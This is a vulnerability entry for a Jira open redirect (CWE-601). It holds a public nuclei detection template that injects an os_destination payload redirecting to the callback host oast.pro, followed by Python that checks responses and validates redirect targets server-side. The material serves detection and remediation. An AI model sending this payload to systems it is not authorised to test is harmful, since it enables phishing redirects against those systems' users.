jira-https-mode-open-redirect: JIRA in HTTPS mode - Open Redirect

Date: 2026-01-08 | Affected software: JIRA | PoC: public

Vulnerability description

Open redirect vulnerability in Jira via the os_destination parameter, affecting versions 5.2.11, 6.2, and 6.2.2.

PoC code [public]

id: jira-https-mode-open-redirect

info:
  name: JIRA in HTTPS mode - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: |
    Detected Open redirect vulnerability in Jira via os_destination parameter versions 5.2.11, 6.2, and 6.2.2.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-38075
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
    cvss-score: 5.8
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 1
  tags: confluence,atlassian,jira,redirect,atlassian,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/ThisCanBeAnything?os_destination=%2F%2Foast.pro"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*)(?:https?://|//|/\\\\)?[a-zA-Z0-9._@-]*oast\.pro.*$'

      - type: status
        status:
          - 302
# digest: 4a0a00473045022100da48ec9b8be56200daa7666baac206e31d4264dfb6b9aeb42c367fd281ddebb202200a2ca6a53bac5bf7e39dcf5f5cba9449a4380d77da482ce9fa27e0083198e911:922c64590222798bb761d5b6d8e72950
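As an added example (not part of the template above or of the nuclei project), the Python below applies the template's Location-header regex to a constructed 302 response and pairs it with the server-side allow-list check that closes CWE-601: an os_destination value is accepted only when it is a same-host path. The function names and the sample responses are my own constructions.

```python
import re
from urllib.parse import unquote, urlsplit

# Regex copied from the nuclei template: it flags a Location header that sends
# the client to the oast.pro callback host, whether written as an absolute URL,
# a protocol-relative "//host" or a backslash "/\\host" form.
LOCATION_RE = re.compile(
    r'(?m)^(?:Location\s*?:\s*)(?:https?://|//|/\\\\)?[a-zA-Z0-9._@-]*oast\.pro.*$'
)


def response_indicates_open_redirect(status: int, raw_headers: str) -> bool:
    """Mirror the template's matchers-condition: status 302 AND the Location
    header points at the external host (both must hold)."""
    return status == 302 and LOCATION_RE.search(raw_headers) is not None


def is_safe_local_destination(dest: str) -> bool:
    """Server-side validation for an os_destination value (hypothetical helper).

    Accepts only a path that stays on the current host. Browsers treat "//host"
    and "/\\host" as a new authority, so those prefixes are rejected even
    though they begin with a slash. The value is decoded once first so the
    URL-encoded %2F%2F form used in the PoC is caught as well.
    """
    dest = unquote(dest)
    if not dest.startswith("/"):
        return False  # relative or scheme-bearing value, not a site path
    if dest.startswith("//") or dest.startswith("/\\"):
        return False  # protocol-relative redirect to another host
    parts = urlsplit(dest)
    return not parts.scheme and not parts.netloc


if __name__ == "__main__":
    # Constructed responses, not captured from a real Jira instance.
    vulnerable = "HTTP/1.1 302 Found\r\nLocation: //oast.pro/\r\nContent-Length: 0\r\n"
    benign = "HTTP/1.1 302 Found\r\nLocation: /secure/Dashboard.jspa\r\n"
    print(response_indicates_open_redirect(302, vulnerable))  # True
    print(response_indicates_open_redirect(302, benign))      # False
    print(is_safe_local_destination("%2F%2Foast.pro"))        # False
    print(is_safe_local_destination("/secure/Dashboard.jspa"))  # True
```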
